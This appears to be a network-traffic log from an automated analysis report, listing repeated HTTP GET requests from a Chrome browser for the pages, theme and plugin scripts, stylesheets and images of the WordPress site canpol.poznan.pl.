Source: global trafficHTTP traffic detected: GET /wp-content/plugins/fancy-box/jquery.fancybox.js?ver=1.2.6 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/fancy-box/jquery.easing.js?ver=1.3 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/modernizr.js?ver=2.6.2 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2016/08/gift-553158_1920.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /en/ HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/fancy-box/jquery.fancybox.js?ver=1.2.6 HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/fancy-box/jquery.easing.js?ver=1.3 HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery.min.js?ver=3.6.0 HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/modernizr.js?ver=2.6.2 HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2016/04/logo_new2.png HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/css/box-roll.css?ver=5.8 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.16 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=5.8 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/ui/core.min.js?ver=1.12.1 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/ui/menu.min.js?ver=1.12.1 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2016/08/gift-553158_1920.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.7 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/dom-ready.min.js?ver=71883072590656bf22c74c7b887df3dd HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2016/04/logo_new2.png HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/hooks.min.js?ver=a7edae857aab69d69fa10d5aef23a5de HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/i18n.min.js?ver=5f1269854226b4dd90450db411a12b79 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/ui/core.min.js?ver=1.12.1 HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/a11y.min.js?ver=0ac8327cc1c40dcfdf29716affd7ac63 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/ui/menu.min.js?ver=1.12.1 HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/ui/autocomplete.min.js?ver=1.12.1 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.7 HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/dom-ready.min.js?ver=71883072590656bf22c74c7b887df3dd HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/nectar/assets/functions/ajax-search/wpss-search-suggest.js HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.4.2 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/imagesloaded.min.js?ver=4.1.4 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0 HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/hooks.min.js?ver=a7edae857aab69d69fa10d5aef23a5de HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/masonry.min.js?ver=4.2.2 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery.masonry.min.js?ver=3.1.2b HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/i18n.min.js?ver=5f1269854226b4dd90450db411a12b79 HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/a11y.min.js?ver=0ac8327cc1c40dcfdf29716affd7ac63 HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/ui/autocomplete.min.js?ver=1.12.1 HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/wp-ultimate-gallery/libs/light-slider/lightslider.min.js?ver=20120206 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/wp-ultimate-gallery/libs/infinite-scroll/jquery.infinitescroll.min.js?ver=20120206 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/nectar/assets/functions/ajax-search/wpss-search-suggest.js HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/wp-ultimate-gallery/libs/infinite-scroll/imagesloaded.pkgd.min.js?ver=20120206 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/magnific.js?ver=7.0.1 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.4.2 HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/imagesloaded.min.js?ver=4.1.4 HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery.masonry.min.js?ver=3.1.2b HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
